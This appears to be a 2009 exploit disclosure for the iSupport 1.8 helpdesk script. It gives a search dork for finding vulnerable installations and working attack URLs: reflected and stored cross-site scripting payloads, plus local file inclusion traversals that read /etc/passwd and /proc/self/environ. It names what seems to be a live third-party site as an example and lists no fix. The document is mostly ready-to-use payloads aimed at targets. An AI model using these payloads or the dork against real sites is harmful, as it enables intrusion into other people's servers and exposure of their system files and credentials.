---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------
 
 
Discovered by : Stink' & Essandre
DATE : 16/12/09
 
//////////////////////////////////////////////////////////////////////
 
Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $
 
//////////////////////////////////////////////////////////////////////
 
 
[+] Vulnerability and Exploitation
 
Dork : "Powered by [ iSupport 1.8 ]"
 
 
--[XSS]--
 
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]
 
Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
 
--[XSS]-- in the member zone
 
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)
 
--[LFI]--
 
http://[TARGET]/[PATH]/index.php?include_file=[LFI]
 
Exemple :
 
http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd
 
 
[+] Solution :
 
N/A
 
The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.